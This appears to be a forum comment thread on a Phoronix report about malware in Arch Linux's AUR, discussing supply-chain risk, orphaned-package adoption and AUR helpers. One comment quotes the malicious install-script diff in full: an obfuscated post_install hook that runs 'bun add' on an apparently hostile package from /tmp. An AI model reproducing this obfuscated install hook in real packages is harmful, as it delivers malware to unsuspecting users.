Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack
phoronix.com
phoronix.com
This is also why I really dislike a lot of modern languages with automated fetching of dependencies. It really fosters a sloppy attitude toward your supply chain because it's just too damned convenient. With a reasonably sized Go project for instance, you may be pulling in code from dozens of different git repos. It only takes one compromised repo or malicious package to sink the ship.
OpenAI and Anthropic both provide free credits for OSS.
Smaller models feasibly can review every commit IMO. Would not be cheap for sure, but also would probably be cheaper than a single fulltime employee.
What really worries me is that on Nix we have a strong habit of patching packages to work around problems caused by the fact that NixOS doesn't use FHS. So, in theory, someone could submit an obscure patch to systemd and get everyone affected by it, if it through the approval process.
The solution so far has been a very rigorous process to even get a commit bit into nixpkgs: https://github.com/NixOS/nixpkgs-committers
Also Nixpkgs isn't really that special when it comes to patching. Making thousands of software all work coherently on a single system inevitably requires heavy amount of pop patching. Nixpkgs actually handles this better by having easier ways to make customizations.
Also i find it surprising that there's only very little/slow communication from Arch via their news channel. For example, how users can check for infections.
This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:
diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
new file mode 100644
index 000000000000..9806501accad
--- /dev/null
+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+ $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}
[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...Unfortunately, I don't see a way of viewing the ownership history of a package in the AUR. I know you get emails with ownership changes if you're subscribed to a package, but I don't see this info in the web interface anywhere.
Yes. This has happened before, a few times, before LLMs were even a thing. Via the same mechanism as well (someone else adopting an orphaned package). The big one I'm remembering was in 2018.
Outside of that mechanism though, anyone who uses the AUR regularly knowingly accepts this kind of risk. It's why I'm not a huge fan of distros (like Cachy, Endevaor, etc) that take Arch and package it up in a one-click easy installer with preinstalled AUR helpers. Cachy even uses the chaotic AUR too (auto build service for AUR packages to serve binaries). I like CachyOS, but good lord don't put in Yay + the AUR by default.
The ability for any registered user to just adopt an existing orphaned package is a problem (these attacks will always exist, but least force a fork & resubmission under a different name), and so is the use of automated AUR helpers that don't show PKGBUILD diffs.
The hygiene required to use the AUR is no different than the hygiene required to use pip, npm, cargo, etc. Anyone just blindly trusting user submitted packages and code from the internet is not operating with security in mind.
Adopt a policy of zero trust from any arbitrary code you download from the internet.
They're already running at a significant loss. giving out more free stuff isnt going to help.
What they really need to do is charge what it actually costs them. That will slow down the abuse a little.
I think what will happen is you'll get 3 or four "Tiers" of AI.
Tier 1: Big Corpo's, Govornments and soverign wealth institutions. Top of the line and dangerous AI, very likely to be abused and used to enrich the already powerful.
Tier 2: Enterprise level AI, Rich local Gov and rich individuals might have these. maybe also SAAS providors will tap into this. Functional but not really smart like Tier 1.
Tier 3: Community AI. Small business etc will use this. basically automated orchestration
Tier 4: Home AI.
I think this is where we're headed. and this is of course after the bubble pops and we get an economic crash because of the popping. (other events going on in the world and various economies and political scenes.)